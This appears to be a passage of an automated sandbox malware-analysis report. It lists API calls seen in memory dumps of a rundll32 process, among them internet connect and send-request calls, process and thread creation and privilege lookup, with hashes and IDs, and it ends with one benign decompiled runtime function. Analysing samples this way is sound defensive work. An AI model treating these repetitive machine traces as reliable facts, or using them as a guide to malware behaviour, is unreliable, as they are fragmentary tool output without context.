                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 00F4AB0C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: HttpRequestSend
                                                                                                            • String ID: Http$HttpSendRequestA$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
                                                                                                            • API String ID: 360639707-2503632690
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 00F4AA18
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ConnectInternet
                                                                                                            • String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
                                                                                                            • API String ID: 3050416762-1024195942
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 00F4A997
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: InternetOpen
                                                                                                            • String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
                                                                                                            • API String ID: 2038078732-3155091674
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • InternetCloseHandle.WININET(CloseHandle,?,?,?,00000000), ref: 00F4ABDF
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandleInternet
                                                                                                            • String ID: Clos$CloseHandle$Inte$dle$eHan$rnet
                                                                                                            • API String ID: 1081599783-4067651292
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • InternetCloseHandle.WININET(CloseHandle,?,?,?,00000000), ref: 00F4ABDF
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandleInternet
                                                                                                            • String ID: Clos$CloseHandle$Inte$dle$eHan$rnet
                                                                                                            • API String ID: 1081599783-4067651292
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Sleep
                                                                                                            • String ID: net.dll$wininet.dll
                                                                                                            • API String ID: 3472027048-1269752229
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Sleep
                                                                                                            • String ID: net.dll$wininet.dll
                                                                                                            • API String ID: 3472027048-1269752229
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • CoInitialize.OLE32(00000000,00000000,00F33D06,00000000), ref: 00F433E7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Initialize
                                                                                                            • String ID: @J7<
                                                                                                            • API String ID: 2538663250-2016760708
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • CoInitialize.OLE32(00000000,00000000,00F33D06,00000000), ref: 00F433E7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Initialize
                                                                                                            • String ID: @J7<
                                                                                                            • API String ID: 2538663250-2016760708
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • PostThreadMessageW.USER32(0000000D,00000111,00000000,00000000,?), ref: 00F376EA
                                                                                                            • PostThreadMessageW.USER32(0000000D,00008003,00000000,?,00000000), ref: 00F3770B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: MessagePostThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 1836367815-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00F3A1C2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Load
                                                                                                            • String ID:
                                                                                                            • API String ID: 2234796835-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • CreateProcessInternalW.KERNEL32(?,?,?,00000010,?,00000044,?,?,?,00000044,?,00000010,?,?,?,?), ref: 00F4A6F4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateInternalProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 2186235152-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • CreateProcessInternalW.KERNEL32(?,?,?,00000010,?,00000044,?,?,?,00000044,?,00000010,?,?,?,?), ref: 00F4A6F4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateInternalProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 2186235152-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,-00000002,?,00000000,00000000,?,?,00F3D300,?,?), ref: 00F491AC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 2422867632-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • CreateProcessInternalW.KERNEL32(?,?,?,00000010,?,00000044,?,?,?,00000044,?,00000010,?,?,?,?), ref: 00F4A6F4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateInternalProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 2186235152-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,-00000002,?,00000000,00000000,?,?,00F3D300,?,?), ref: 00F491AC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 2422867632-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,00F3D5D2,00F3D5D2,?,00000000,?,?), ref: 00F4A7C0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: LookupPrivilegeValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 3899507212-0
                                                                                                            • Opcode ID: a22183032ce568132cd632b8e56578c2a860b9728e854ab8411d6452cd713bae
                                                                                                            • Instruction ID: 22340c773398cfa5f2a23daecb36e75956d59a005fab6d94a5a7f659a7cbb39e
                                                                                                            • Opcode Fuzzy Hash: a22183032ce568132cd632b8e56578c2a860b9728e854ab8411d6452cd713bae
                                                                                                            • Instruction Fuzzy Hash: 1AE092B52102086FDB10DFA8CC44EE73769DF84654F114155FD4C5B241C931E84587F2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • RtlAllocateHeap.NTDLL(00F45196,?,00F4590F,00F4590F,?,00F45196,?,?,?,?,?,00000000,00000005,00000206), ref: 00F4A61D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 1279760036-0
                                                                                                            • Opcode ID: 4eeee5f58efdf21d171fa9f1326e000b1994929843c0f345beb3c8c7aaa15deb
                                                                                                            • Instruction ID: 820e5c5c50a31bfa0ba414c3e3a3b48c06c2c7f300223d025d0a5753cfc6ef57
                                                                                                            • Opcode Fuzzy Hash: 4eeee5f58efdf21d171fa9f1326e000b1994929843c0f345beb3c8c7aaa15deb
                                                                                                            • Instruction Fuzzy Hash: BDE04FB52002046BDB14DF89DC45E9737ACEF88754F018154FE085B241C530F914CBF1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • RtlFreeHeap.NTDLL(00000060,00000005,00000000,00000000,00000005,00000060,00000000,00000000,?,?,00000000,00000206,?), ref: 00F4A65D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FreeHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 3298025750-0
                                                                                                            • Opcode ID: a1f7dc8e7f53a3f8249f2c6d0a6452cc2d574f3e67fea06934ffed66e3b82adc
                                                                                                            • Instruction ID: 33efa50230179cf2ccdcc711c3b263d432a54cb7863cf37513a9ad150b88130b
                                                                                                            • Opcode Fuzzy Hash: a1f7dc8e7f53a3f8249f2c6d0a6452cc2d574f3e67fea06934ffed66e3b82adc
                                                                                                            • Instruction Fuzzy Hash: 44E046B5200208AFDB14EF89DC49EA73BACEF88760F118158FE085B252C630F914CAF1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,00F3D5D2,00F3D5D2,?,00000000,?,?), ref: 00F4A7C0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: LookupPrivilegeValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 3899507212-0
                                                                                                            • Opcode ID: 1603bad059ca15678eb2c8229aefeef34436a6a2ffabd18c43c9bb13eb52ef96
                                                                                                            • Instruction ID: b012ab63052d245a1791aaced2df65a1cca690af142f5d93995afd5052826e18
                                                                                                            • Opcode Fuzzy Hash: 1603bad059ca15678eb2c8229aefeef34436a6a2ffabd18c43c9bb13eb52ef96
                                                                                                            • Instruction Fuzzy Hash: BEE01AB52402086BDB10DF89CC45EE737ADAF89664F018154BE0857241C530E8148AB1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • SetErrorMode.KERNEL32(00008003,?,?,00F38243,?), ref: 00F3DA6B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorMode
                                                                                                            • String ID:
                                                                                                            • API String ID: 2340568224-0
                                                                                                            • Opcode ID: 5a551d80a4083e28110e8012284c8ae4a1e4c37754f2aa61b36d96ea9e7fc66f
                                                                                                            • Instruction ID: acf1cffede293358b2c8fb233bb5ef7b2ea9a26c2682878dabf9660eda2c246a
                                                                                                            • Opcode Fuzzy Hash: 5a551d80a4083e28110e8012284c8ae4a1e4c37754f2aa61b36d96ea9e7fc66f
                                                                                                            • Instruction Fuzzy Hash: B1D0A79196C3842AFF21F7F15D43F5B3E544B01A60F1947ADE948BA4C3D88CD1155235
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • SetErrorMode.KERNEL32(00008003,?,?,00F38243,?), ref: 00F3DA6B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorMode
                                                                                                            • String ID:
                                                                                                            • API String ID: 2340568224-0
                                                                                                            • Opcode ID: 785235cf212cd6fac8d19be006f72e66bb65ffde2b76f0b6724cfa02a8199225
                                                                                                            • Instruction ID: 03fceb51d49e6e86f41cec2f117d81229da57483d38f99411a1b20b2a22632ee
                                                                                                            • Opcode Fuzzy Hash: 785235cf212cd6fac8d19be006f72e66bb65ffde2b76f0b6724cfa02a8199225
                                                                                                            • Instruction Fuzzy Hash: D9D0A77164030437FA10E6E49C43F2632CC9B48F50F054064FA09E73C3E958F5004164
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.775512023.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: true
                                                                                                            • Associated: 0000000F.00000002.775632132.000000000529B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                            • Associated: 0000000F.00000002.775648086.000000000529F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_5180000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: ed3508fa7e73912aad1717b312f0cf5c05b111d3021d2869c38ce59b3c8cb626
                                                                                                            • Instruction ID: 36c0f50812ad6c9620d480ba26b632f2bcb562b9a73ff282c775b9d545c1b2ba
                                                                                                            • Opcode Fuzzy Hash: ed3508fa7e73912aad1717b312f0cf5c05b111d3021d2869c38ce59b3c8cb626
                                                                                                            • Instruction Fuzzy Hash: 33B09BB19014C5C5D611D7605708B37791177D5745F57C456D2020641A477CC0D1F6B5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 53%
                                                                                                            			E0523FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                                                            				void* _t7;
                                                                                                            				intOrPtr _t9;
                                                                                                            				intOrPtr _t10;
                                                                                                            				intOrPtr* _t12;
                                                                                                            				intOrPtr* _t13;
                                                                                                            				intOrPtr _t14;
                                                                                                            				intOrPtr* _t15;
                                                                                                            
                                                                                                            				_t13 = __edx;
                                                                                                            				_push(_a4);
                                                                                                            				_t14 =  *[fs:0x18];
                                                                                                            				_t15 = _t12;
                                                                                                            				_t7 = E051ECE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                                                            				_push(_t13);
                                                                                                            				E05235720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                                                            				_t9 =  *_t15;
                                                                                                            				if(_t9 == 0xffffffff) {
                                                                                                            					_t10 = 0;
                                                                                                            				} else {
                                                                                                            					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                                                            				}
                                                                                                            				_push(_t10);
                                                                                                            				_push(_t15);
                                                                                                            				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                                                                            				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                                                            				return E05235720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                                                            			}











                                                                                                            APIs
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0523FDFA
                                                                                                            Strings
                                                                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0523FE01
                                                                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0523FE2B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.775512023.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: true
                                                                                                            • Associated: 0000000F.00000002.775632132.000000000529B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                            • Associated: 0000000F.00000002.775648086.000000000529F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_5180000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                                            • API String ID: 885266447-3903918235
                                                                                                            • Opcode ID: 3ed59f9033ab8f59da76567c98928ca3b97000cc9dfee756dfc8de8faf2096d6
                                                                                                            • Instruction ID: 7a7828c711a847314d1032592a18e6da992b3a224d95ec86fbd4d81b4c7ca5d9
                                                                                                            • Opcode Fuzzy Hash: 3ed59f9033ab8f59da76567c98928ca3b97000cc9dfee756dfc8de8faf2096d6
                                                                                                            • Instruction Fuzzy Hash: 0FF0CDB6660601BBEB241A45DC46E23BF6AEF44730F240214F628561E1EAA2A86096E0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%